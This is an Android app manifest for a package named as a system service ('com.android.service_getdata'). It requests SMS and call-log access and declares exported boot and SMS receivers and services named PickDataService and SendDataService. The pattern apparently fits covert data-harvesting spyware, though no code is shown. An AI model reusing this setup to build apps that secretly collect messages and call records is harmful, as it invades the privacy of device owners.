<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.android.service_getdata" >

    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
    <uses-permission android:name="android.permission.READ_SMS" />
    <uses-permission android:name="android.permission.RECEIVE_SMS" />
    <uses-permission android:name="android.permission.READ_CALL_LOG" />
    <uses-permission android:name="android.permission.INTERNET" />
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
    <uses-permission android:name="android.permission.WAKE_LOCK"/>

    <application
        android:name=".application.ServiceApp"
        android:allowBackup="true"
        android:icon="@drawable/ic_launcher"
        android:label="@string/app_name"
        android:theme="@style/AppTheme" >
        <activity
            android:name=".MainActivity"
            android:label="@string/app_name" >
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />

                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>

        <receiver
            android:name=".AllReceiver"
            android:enabled="true"
            android:exported="true" >
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED" />
                <action android:name="android.provider.Telephony.SMS_RECEIVED" />
                <action android:name="android.net.conn.CONNECTIVITY_CHANGE" />
                <action android:name="android.net.wifi.WIFI_STATE_CHANGED" />
            </intent-filter>
        </receiver>

        <service
            android:name=".Service.PickDataService"
            android:enabled="true"
            android:exported="true" >
        </service>

        <provider
            android:name=".provider.BasicServiceProvider"
            android:authorities="com.android.service_getdata.provider.BasicServiceProvider"
            android:exported="true"
            android:multiprocess="true" />
        <provider
            android:name=".provider.SyncServiceProvider"
            android:authorities="com.android.service_getdata.provider.SyncServiceProvider"
            android:exported="true"
            android:multiprocess="true" />

        <service
            android:name=".Service.SendDataService"
            android:enabled="true"
            android:exported="true" >
        </service>

        <receiver android:name=".receivers.BackupSchedular"></receiver>
    </application>

</manifest>
